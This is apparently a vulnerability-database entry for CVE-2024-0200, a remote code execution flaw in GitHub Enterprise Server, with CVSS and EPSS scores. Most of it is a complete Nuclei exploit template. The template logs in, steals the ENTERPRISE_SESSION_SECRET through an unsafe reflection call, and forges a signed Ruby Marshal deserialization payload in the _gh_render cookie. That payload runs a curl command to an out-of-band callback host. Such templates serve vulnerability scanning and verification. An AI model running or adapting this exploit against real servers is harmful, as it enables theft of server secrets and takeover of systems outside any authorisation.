CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
93.5%
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
id: CVE-2024-0200
info:
name: Github Enterprise Authenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
reference:
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/[email protected]/admin/release-notes#3.10.5
- https://docs.github.com/en/[email protected]/admin/release-notes#3.11.3
- https://docs.github.com/en/[email protected]/admin/release-notes#3.8.13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0200
cwe-id: CWE-470
epss-score: 0.06844
epss-percentile: 0.93885
cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 7
vendor: github
product: "enterprise_server"
shodan-query:
- "title:\"GitHub Enterprise\""
- micro focus dsd
fofa-query: "app=\"Github-Enterprise\""
tags: cve,cve2024,rce,github,enterprise
variables:
username: "{{username}}"
password: "{{password}}"
oast: "curl {{interactsh-url}}/?"
padstr: "{{randstr}}"
payload: '{{padding(oast,padstr,300)}}'
marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
final_payoad: "{{ b64_marshal_data + '--' + digest}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/v3/user/orgs"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors:
- type: json
part: body
name: org_name
internal: true
json:
- ".[].login"
- method: GET
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition: and
matchers:
- type: word
words:
- '"role": "admin"'
part: body
- method: POST
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers:
Content-Type: application/json
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body: |
{
"name": "{{randstr}}"
}
matchers:
- type: status
status:
- 201
- method: GET
cookie-reuse: true
path:
- "{{BaseURL}}/login"
extractors:
- type: regex
part: body
internal: true
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
name: csrf_token
- method: POST
path:
- "{{BaseURL}}/session"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers:
- type: status
status:
- 302
- type: word
words:
- "_gh_render"
part: header
- method: GET
path:
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors:
- type: regex
group: 1
name: ghe_secret
internal: true
regex:
- '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"'
part: body
matchers:
- type: word
words:
- 'ENTERPRISE_SESSION_SECRET'
part: body
- method: GET
path:
- "{{BaseURL}}/"
headers:
Cookie: _gh_render={{final_payoad}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950
blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
docs.github.com/en/[email protected]/admin/release-notes#3.10.5
docs.github.com/en/[email protected]/admin/release-notes#3.11.3
docs.github.com/en/[email protected]/admin/release-notes#3.8.13
starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
93.5%